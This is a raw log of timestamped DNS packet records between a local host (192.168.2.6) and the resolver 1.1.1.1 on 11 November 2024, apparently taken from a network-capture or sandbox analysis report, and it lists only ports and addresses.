Nov 11, 2024 18:13:43.985307932 CET	53	52726	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.985526085 CET	53	49380	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.988019943 CET	53	55002	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.988523006 CET	62973	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.988579035 CET	53	51508	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.989623070 CET	53	56481	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.989937067 CET	53	59916	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.989948988 CET	53	54307	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.990487099 CET	53	52563	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.990745068 CET	53	50505	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:43.994539976 CET	59864	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.997380972 CET	62796	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:43.999507904 CET	64715	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.001445055 CET	53	52347	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.002919912 CET	53	58332	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.003391981 CET	53	52851	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.003797054 CET	53	51012	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.005625010 CET	53	62796	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.010508060 CET	53	57969	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.012639046 CET	50935	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.014154911 CET	58001	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.019810915 CET	53	62973	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.022273064 CET	53	58001	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.024712086 CET	53	50935	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.032898903 CET	53	64715	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.096927881 CET	53	59864	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.393692970 CET	60835	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.394556046 CET	63067	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.395746946 CET	53484	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.399842978 CET	53897	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.402865887 CET	53	60835	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.406196117 CET	53	53484	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.410715103 CET	53	53897	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.425667048 CET	53	63067	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.437551975 CET	58853	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.437711954 CET	63091	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.437865019 CET	59593	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.438035965 CET	60428	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.438180923 CET	64507	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.438565016 CET	57384	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.438747883 CET	49965	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.438977957 CET	61011	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.439832926 CET	49425	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.439985991 CET	56961	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.440330982 CET	53621	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.444657087 CET	53	58853	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.445596933 CET	53	63091	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.447351933 CET	53	59593	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.449670076 CET	53	49965	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.450845003 CET	53	49425	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.451075077 CET	53	53621	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.468898058 CET	53	64507	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.469935894 CET	53	60428	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.469948053 CET	53	61011	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.470312119 CET	53	57384	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.471225023 CET	53	56961	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.482620001 CET	56020	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.482765913 CET	58099	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.482917070 CET	50588	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.483056068 CET	52275	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.489440918 CET	58352	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.489697933 CET	61467	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.490088940 CET	62981	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.490276098 CET	57033	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.490698099 CET	51380	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.490854025 CET	49174	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.491864920 CET	53	52275	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.492656946 CET	53	58099	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.494788885 CET	53	50588	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.499347925 CET	53	57033	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.499761105 CET	59136	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.501336098 CET	53	58352	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.501912117 CET	51034	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.501987934 CET	53	51380	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.501997948 CET	53	49174	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.502621889 CET	64058	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.505115032 CET	63453	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.507428885 CET	53	59136	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.512165070 CET	53	63453	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.513289928 CET	53	56020	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.521368027 CET	53	61467	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.521724939 CET	53	62981	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.533029079 CET	53	51034	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.534112930 CET	53	64058	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.569621086 CET	54197	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.573297977 CET	58519	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.575357914 CET	59475	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.575870037 CET	64869	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.578123093 CET	53	54197	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.580663919 CET	63223	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.584014893 CET	53	58519	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.585975885 CET	53	59475	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.586514950 CET	53	64869	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.592135906 CET	53	63223	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.601624966 CET	56802	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.602355957 CET	64863	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.603753090 CET	59757	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.612915039 CET	53	56802	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.613485098 CET	53	64863	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.619992018 CET	60214	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.631278038 CET	53	60214	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.636698008 CET	53	59757	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.663028955 CET	63633	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.698116064 CET	53	63633	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.853296041 CET	57114	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.853353977 CET	49819	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.853818893 CET	59120	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.853955984 CET	53420	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.854554892 CET	52566	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.855170012 CET	55841	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.855472088 CET	63466	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.855586052 CET	59267	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.855935097 CET	51621	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.856555939 CET	57317	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.857222080 CET	58147	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.857290030 CET	65292	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.857431889 CET	49435	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.858385086 CET	65529	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.859189987 CET	54820	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.861639977 CET	64661	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.862200975 CET	54663	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.862407923 CET	62092	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.862513065 CET	53	55841	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.864012957 CET	53	59120	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.864315987 CET	53	53420	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.864326000 CET	53	57114	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.865515947 CET	53	52566	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.865667105 CET	53	51621	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.865678072 CET	53	59267	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.866024017 CET	53	63466	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.866431952 CET	53	58147	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.866442919 CET	53	57317	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.867695093 CET	53	49435	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.868107080 CET	53	54820	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.868118048 CET	53	65529	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.869065046 CET	59033	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.869899035 CET	64920	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.870059967 CET	57585	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.870204926 CET	59732	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.870835066 CET	53206	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.872819901 CET	53	64661	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.873841047 CET	53	54663	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.875861883 CET	57353	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.876092911 CET	59901	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.880656004 CET	53	57585	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.880669117 CET	53	53206	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.881808996 CET	53	59732	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.885550022 CET	53	49819	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.886050940 CET	53	57353	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.886358023 CET	53	59901	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.889708042 CET	53	65292	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.891074896 CET	53558	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.892286062 CET	63688	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.892474890 CET	64598	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.893435001 CET	60376	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.893495083 CET	53	62092	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.893605947 CET	59499	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.899624109 CET	53	63688	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.899635077 CET	53	59033	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.900820971 CET	53	53558	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.901978016 CET	53	64920	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.904268980 CET	53	60376	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.905030966 CET	53	64598	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.907352924 CET	56894	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.907560110 CET	55796	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.909473896 CET	55596	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.909873009 CET	52777	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.910161972 CET	63422	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.910307884 CET	63021	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.910679102 CET	51755	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.910837889 CET	50995	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.910978079 CET	53454	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.911319017 CET	53851	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.911879063 CET	54884	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.914573908 CET	51666	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.916268110 CET	52604	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.919514894 CET	53	63422	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.919526100 CET	53	52777	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.920507908 CET	53	50995	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.920819044 CET	53	51755	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.922192097 CET	53	53851	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.923998117 CET	53	51666	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.924556971 CET	53	59499	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.928520918 CET	55815	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.930433035 CET	53	54884	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.930885077 CET	59543	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.937715054 CET	53	55796	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.939111948 CET	53	56894	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.941715956 CET	53	55596	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.941797018 CET	53	59543	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.942154884 CET	53	53454	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.942306995 CET	62720	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.942416906 CET	53	63021	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.942734003 CET	54260	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.949261904 CET	53	52604	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.950364113 CET	52920	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.950545073 CET	65234	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.950869083 CET	61531	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.951042891 CET	58396	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:44.951872110 CET	53	62720	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.953162909 CET	53	54260	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.959599018 CET	53	52920	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.959647894 CET	53	55815	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.960216999 CET	53	65234	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.960969925 CET	53	61531	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:44.961962938 CET	53	58396	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:45.146270990 CET	49668	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:45.156430006 CET	53	49668	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:45.352404118 CET	50842	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:45.374787092 CET	53	50842	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:45.839503050 CET	63190	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:45.851737022 CET	53	63190	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:46.126096010 CET	57723	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:46.127681971 CET	55950	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:46.127979994 CET	53861	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:46.128629923 CET	49153	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:46.129401922 CET	51942	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:46.133819103 CET	50374	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:46.133966923 CET	63990	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:46.134852886 CET	53	57723	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:46.136838913 CET	53	51942	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:46.139708042 CET	53	49153	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:46.142324924 CET	53	63990	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:46.147160053 CET	53	55950	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:46.158953905 CET	53	53861	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:46.165332079 CET	53	50374	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.043493986 CET	58232	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.049297094 CET	57520	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.060129881 CET	53	57520	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.061745882 CET	50280	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.061852932 CET	56219	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.062071085 CET	50222	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.069175005 CET	53	56219	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.072698116 CET	53	50222	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.072896004 CET	53	50280	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.075527906 CET	53	58232	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.082067966 CET	63374	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.082319021 CET	63670	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.082673073 CET	55034	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.091850042 CET	53	63374	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.092776060 CET	53	55034	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.104826927 CET	54091	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.110718012 CET	61887	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.114089012 CET	53	63670	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.116621017 CET	53	54091	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.119843960 CET	53	61887	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.125293970 CET	51448	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.132958889 CET	53	51448	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.167429924 CET	62333	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.170120955 CET	63438	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.176233053 CET	52638	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.181145906 CET	53	63438	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.183396101 CET	56486	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.183921099 CET	59627	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.183957100 CET	51767	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.186933041 CET	49675	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.193080902 CET	53	51767	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.193099976 CET	53	59627	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.193696022 CET	53	56486	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.198641062 CET	53	49675	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.199346066 CET	53	62333	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.206362963 CET	53	52638	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.215873957 CET	62174	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.216181040 CET	57437	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.218878984 CET	55246	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.247561932 CET	53	62174	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.247759104 CET	53	57437	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.250853062 CET	53	55246	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.266604900 CET	56581	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.268773079 CET	55702	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.269567966 CET	54116	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.278630972 CET	58721	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.278887987 CET	54153	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.281045914 CET	54075	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.281270027 CET	58847	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.287329912 CET	55371	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.289155006 CET	53	54153	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.291385889 CET	53	58721	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.292546988 CET	53	54075	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.297719955 CET	53	55371	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.299180984 CET	53	56581	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.300988913 CET	53	55702	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.302313089 CET	53	54116	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.313442945 CET	53	58847	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.331530094 CET	51576	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.341681957 CET	53	51576	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.380912066 CET	61779	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.384452105 CET	63929	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.394375086 CET	53	63929	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.413072109 CET	53	61779	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.416707039 CET	55632	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.417459011 CET	56011	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.448771954 CET	53	55632	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.450613976 CET	53	56011	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.510994911 CET	54007	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.543826103 CET	53	54007	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.632997036 CET	63309	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.643300056 CET	53	63309	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.714425087 CET	57935	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.722753048 CET	53	57935	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.783746958 CET	63953	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.784132004 CET	52000	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.784465075 CET	55462	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.785881042 CET	49642	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.786401033 CET	53069	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.786997080 CET	59986	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.787545919 CET	50829	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.787816048 CET	58090	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.788305998 CET	55523	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.788837910 CET	62579	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.789521933 CET	53974	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.790597916 CET	60159	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.791135073 CET	57977	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.791665077 CET	63146	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.792172909 CET	58429	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.793243885 CET	53	63953	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.796364069 CET	53	55462	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.798693895 CET	53	55523	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.798965931 CET	53	49642	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.799657106 CET	53	59986	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.801135063 CET	53	50829	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.801567078 CET	53	58090	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.803359032 CET	53	60159	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.803369999 CET	53	57977	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.808374882 CET	61687	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.808612108 CET	62855	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:47.812424898 CET	53	58429	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.817826033 CET	53	62855	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.817867994 CET	53	52000	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.817888975 CET	53	61687	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.820594072 CET	53	53069	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.823286057 CET	53	63146	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.823816061 CET	53	53974	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:47.824433088 CET	53	62579	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.065736055 CET	56735	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.077514887 CET	53	56735	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.698559999 CET	61604	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.709405899 CET	53	61604	1.1.1.1	192.168.2.6
Nov 11, 2024 18:13:48.718476057 CET	55119	53	192.168.2.6	1.1.1.1
Nov 11, 2024 18:13:48.719513893 CET	58096	53	192.168.2.6	1.1.1.1
